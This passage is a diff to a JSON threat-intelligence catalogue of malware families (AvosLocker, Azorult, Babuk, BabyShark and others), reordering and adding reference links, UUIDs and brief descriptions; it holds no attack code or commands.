- "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen",
- "https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/",
+ "https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf",
+ "https://www.ic3.gov/Media/News/2022/220318.pdf",
+ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
+ "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux",
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen"
],
"synonyms": [],
"type": []
@@ -13154,6 +13990,19 @@
"uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3",
"value": "Avzhan"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.axlocker",
+ "https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "017ea8db-6eb4-4df1-bac0-da908d2aea9f",
+ "value": "AXLocker"
+ },
{
"description": "",
"meta": {
@@ -13185,66 +14034,68 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult",
- "https://community.riskiq.com/article/56e28880",
- "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
- "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
- "https://community.riskiq.com/article/2a36a7d2/description",
- "https://fr3d.hk/blog/gazorp-thieving-from-thieves",
- "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
- "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update",
- "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
- "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
- "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html",
- "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
- "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/",
- "https://twitter.com/DrStache_/status/1227662001247268864",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html",
- "https://asec.ahnlab.com/en/26517/",
- "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://isc.sans.edu/diary/25120",
+ "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
+ "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
+ "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/",
+ "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
+ "https://community.riskiq.com/article/56e28880",
+ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
"https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
- "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://asec.ahnlab.com/en/26517/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/",
"https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers",
- "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://securelist.com/azorult-analysis-history/89922/",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/",
- "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/",
- "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
"https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/",
+ "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update",
"https://unit42.paloaltonetworks.com/cybersquatting/",
+ "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/",
+ "https://fr3d.hk/blog/gazorp-thieving-from-thieves",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
+ "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
+ "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://community.riskiq.com/article/2a36a7d2/description",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html",
+ "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
"https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/",
+ "https://securelist.com/azorult-analysis-history/89922/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
+ "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/",
+ "https://twitter.com/DrStache_/status/1227662001247268864",
+ "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
@@ -13256,31 +14107,50 @@
"uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c",
"value": "Azorult"
},
+ {
+ "description": "According to Checkpoint, this malware is a wiper instead of ransomware as self-announced. It is manually written in FASM, unrecoverably overwriting data in blocks of 666 bytes, using multi-threading.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper",
+ "https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/",
+ "https://twitter.com/_CPResearch_/status/1587837524604465153",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "db8dee2a-938e-46af-b2e3-ef5d6e626da7",
+ "value": "Azov Wiper"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda",
+ "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcb369e1-0783-4188-8841-936c6976035f",
+ "value": "Babadeda"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babar",
- "http://www.spiegel.de/media/media-35683.pdf",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/",
"https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/",
- "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/"
+ "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/",
+ "http://www.spiegel.de/media/media-35683.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/"
],
"synonyms": [
"SNOWBALL"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "57b221bc-7ed6-4080-bc66-813d17009485",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "947dffa1-0184-48d4-998e-1899ad97e93e",
"value": "Babar"
},
@@ -13289,54 +14159,55 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
- "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
- "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
- "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://securelist.com/ransomware-world-in-2021/102169/",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
- "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/",
- "https://twitter.com/Sebdraven/status/1346377590525845504",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/",
- "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
- "https://twitter.com/GossiTheDog/status/1409117153182224386",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf",
- "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
- "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
- "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
- "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/",
"https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf",
- "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/",
- "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
- "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
"https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
+ "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
"https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
+ "https://twitter.com/Sebdraven/status/1346377590525845504",
+ "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt",
+ "https://twitter.com/GossiTheDog/status/1409117153182224386",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
+ "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://blog.morphisec.com/babuk-ransomware-variant-major-attack",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
+ "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
+ "https://securelist.com/ransomware-world-in-2021/102169/",
+ "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf",
+ "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
"https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
- "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html"
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf",
+ "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
+ "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/"
],
"synonyms": [
"Babyk",
@@ -13365,11 +14236,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.mandiant.com/resources/evolution-of-fin7",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000"
],
"synonyms": [],
"type": []
@@ -13384,35 +14255,43 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark",
"https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
"https://twitter.com/i/web/status/1099147896950185985",
- "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
+ "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1",
+ "https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://blog.alyac.co.kr/3352",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
+ "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
"https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
"https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
- "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1",
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
- "https://blog.alyac.co.kr/3352",
- "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI"
+ ],
+ "synonyms": [
+ "LATEOP"
+ ],
+ "type": []
+ },
+ "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37",
+ "value": "BabyShark"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens",
+ "https://medium.com/threat-intel/cybercrime-investigation-insights-bachosens-e1d6312f6b3a"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "78ed653d-2d76-4a99-849e-1509e4573c32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
- "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37",
- "value": "BabyShark"
+ "uuid": "c5b3d358-62f8-46fe-85dc-44b565052f94",
+ "value": "Bachosens"
},
{
